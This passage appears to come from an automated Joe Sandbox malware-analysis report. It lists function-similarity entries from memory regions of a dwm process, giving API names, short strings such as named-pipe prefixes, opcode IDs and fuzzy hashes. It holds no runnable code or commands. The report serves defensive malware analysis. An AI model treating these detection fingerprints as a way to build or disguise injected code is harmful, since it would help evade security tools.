                                            • Instruction Fuzzy Hash: 80415B33214B80D7EB648F62E45879EB7B1F388B84F148129DBC907A58DF39D969CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: afa602538d2797bded4b6c7ea06a470d0bb9dafd4f93a30f4a6eaa79a6e8d66a
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 4081F7317002C186FA50AB65984D37977F0E7457A0F744025AAED87B96EB7ACC46C333
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: afb9fb156faf5e5d612a2f5814e8a32b2a12bb5acb6f98cdc0cfee454d448a41
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: BC81E42170424586FF64AB25987D3A933B0BB8DB80F3464259AC947796DB3ACC5DC733
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 0fbeb9709375f7d2d595d23e8cc5425cf001224d31ba1ac4dc797d63e0b44c4d
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 1D81F26170064186FE60AB6AA47D359F3F1EBAD780F348225DAC553796DB39C84DC332
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: d49739ca775cc0803dc4d4d5668a84a42e2d4fdbad9d71cd4f5b62f92ef0e885
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: 1331A331212B5491FE219B42A82879973B4FB0CBB0F291529DDAD4B380EF39C85DC322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: 4799e37deccdbe521ca6658cb44aafa6b261db0bd2ca4878bbef8e51be7836f3
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: D0118F21314B5086EB608B56E868319B3B0F78CFE4F244225EA9D87794DF78C928C756
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: be985432805b6dc513fe067e9bded38555f4cade0e1d73a1f31678ba353d60e7
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: 4231A221701B51D2EF65DF56E868269B3B0FB48B84F1C90249EC907B64EF39C8A9C721
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 8c38a29e414c5705bcc91b17333df8a21700ab624f0ecff550373e14768e202c
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: 7B015721300A4196EA20DB22E86835A73A1F78CFC0F688035CE8A47758DF39C999C761
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: 05fbab74c7a2e1d374d0c11e81ca85e75b20dcaa6f63722ad261d8019961d775
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: C4111765611B4486FF249B21E82D71AB7B1BB5DB81F240429CA8907764EF3DC86CC722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction ID: 243d263a016e5836524a2715184f34e8c3ba0fefcbf3b7bdfb362b129e4cbaec
                                            • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction Fuzzy Hash: 7851CF32B526008AEF14DF25E46CB5937B5F348BA8F749120DE9A47788DB36DC49C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: e769027026d0c74d640bbab288917140e62458a0d68b5e7d7c44d05411ac6093
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: A1F03C6230464192EF708B25E4A83597771F758B88F949031CA8A47954DF6DCA9CCB11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: 22ccd04281dca7aeb2f320fe679ebc694a719ec6f431ce4d470ba5bf544b3c20
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: 8AF08220704B8091EE208B13B92C119B771AB4CFD0F289131DEDA47B28CF2CC869C711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: b72d4fde4e442437168374d0a0fe60d391ffe2b79a8d05e3bcb3f7aed35f74cf
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 3FF037A131174491FF585F60E8AC3693370EB5CB90F682419958B47575DF7CC8ACC722
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: b1ddb58fa5e6936b5ffd4475e2243badcb60c5ebdc53fff48fe702909b4df6dc
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: C781D122A106148DFF609F618878BED77B1F74CB94F644616DE8A537D2DB34886AC332
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
                                            • Instruction ID: a854c8f8c128b85c5ae7c74125b40c46c5d9c47bb56728e394e25268d633a265
                                            • Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
                                            • Instruction Fuzzy Hash: 0A61C836619B44C6EB609B15F46831AB7B0F38C744F201115EACE47BA8DB7DC958CF61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 46f915988d1421102dcdc82b7975ccb72b32a6b5722b91e8b7d4d7e4d90cae6a
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 2A117322A54A1101FA641175ED5E36933716B54374F7B462CAAFF0AFE6AB2A8C43C122
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: fb897314bb80f6e4fbd02af684fafd6f3212bc1cdf147bf0c68ed76bc349400d
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: F611C6A3A54B8001FEA81168E57E36573707B6C374F380674BAF6873D68B188C69C123
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 683f9b8f68ede20b299d0a7e2179748c0e82f89c77eef79aed7258c88994293d
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 651173A2B54A1101FFA41265E97E36933716F5C374F784634AEF606BD6AB188C49C122
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: dd434be0664191bedbfb9aec411bcd668004c6ad845439f1ee4a200c2d89c5f7
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 2151B23A7126808BDB14DF15F848B2933B5F340B98FB18125DA8E67788EB35CD41C726
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: ecc4167dbe94ae9efbabca2107a08881a39eb888c4b9e6f9a602dc4e01dc6ccf
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 1A51E4723126408BEF18CF15E468B18B3B5F368B98F758224DA8643788DB34CC89C726
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: c48fda967e298243dbab0d24029148cb6e945a7cf09b7d01290e854a90eb0d3a
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 0E31BC7A21168096E714DF15EC48B2937B4F740B88FA58015AE8E27B84DB39C941C72A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 6cd6259b640fc5b162df8461604404c7a240a2db80030e90e8a5791b303d7b2d
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 4731C2B2311680C6EF18DF15E868719B7B4F758BC8F268214EEDA07744CB38C948C716
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction ID: bf99236e75c4f043a7eb8a321830645b37f162a4c2713fcc161d8c812524cf54
                                            • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction Fuzzy Hash: 63118832514B88D2EB60CFA6A81821EB3B0F78DB80F284029EBCA03714DF38C429C711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: 03d129240146993466009b1063a6d88bc38d23e29861afde8792a487a6ca2546
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: 7271AF3320478145EF749B69A9683AA77A1F74DB84F642016DDC943B89DF36CD08C762
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: 000bd0997d872203a77d3abbbab492f005345b56831d42c0ba2b01d8664bde51
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: 3451A42360478142EE74DE2DA56C36A77A1F789780F256025DACA43F99DB36CC09CB62
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: 833f3a8f25a7b952dfcd67abba18a7a3419a93ece4b259e36d0367d1f4345dc1
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: 6A41E632714A4085EF20CF25E8687AAB7B0F38CB84F604021EE8D87798DB7CC555CB51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: 08cd0ceb70bd5c3fb25b66c53eabe4406d245a66cfcc7065634ecff14abde7ce
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: E3111736608B8086DB60CB16F89429AB7B4F7CDB90F644126EECD83B59DF38C458CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: 23c186619a09c9ee9d8b9a00c63548b1b55c2ea4d6444c44b85e23c33ed3eed4
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: 21111C36218B8082EF618F15E45435A77B5F788BA8F285221DFCD07B68DF39C959CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 20b27b8d4a518f264fed3dfc9a759883ce15e8bc6d6ebdfce8581b57262c2fdb
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 94F02022310B8082EF149F41F8282983731FB8CB80F686025EAC903B15CF39CCACD722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: c3d8921cda906c5774e95c25f1aac2569b143f39ba3aa41cc85fa96dd22f5b4c
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: ACE09222300981D2EA059B55F8892F83331EB84744F795022999D06AA2EF38CC86C3A3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: 431775a00661849778365100a41a7fa4a070d535077f0aa8992765cc744db98f
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: D4E09261300A4091EF144B60FC2C6987332BB8CB80F785026D98907355CF38CC6DC732
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: 1880df601616def159baa5e08da451b38c1faf93aca46100d314e0fbb42e8d4f
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: 42E092A1300541D2FF04BB55F4692E4B331DBEC740F7D5222A99A06692CF38C88EC362
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: a3c266bbf715f0c1863a318cd641b3470c99e6664913a9611b7137eed8d47a33
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: 6F219522604B80C1EF218F6AE41825AF3B0FB8CB94F695120DECC47B14EF79C95AC711
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: 4f06373ecf4a49fd8f407356e393813010d0bbc109c8877feda45518e71cf9cb
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 3FE0C971611600C6EB149B66D82835977E1EB8CB51F598024C98907350DF7D84A9CB61

                                            Execution Graph

                                            Execution Coverage:0.7%
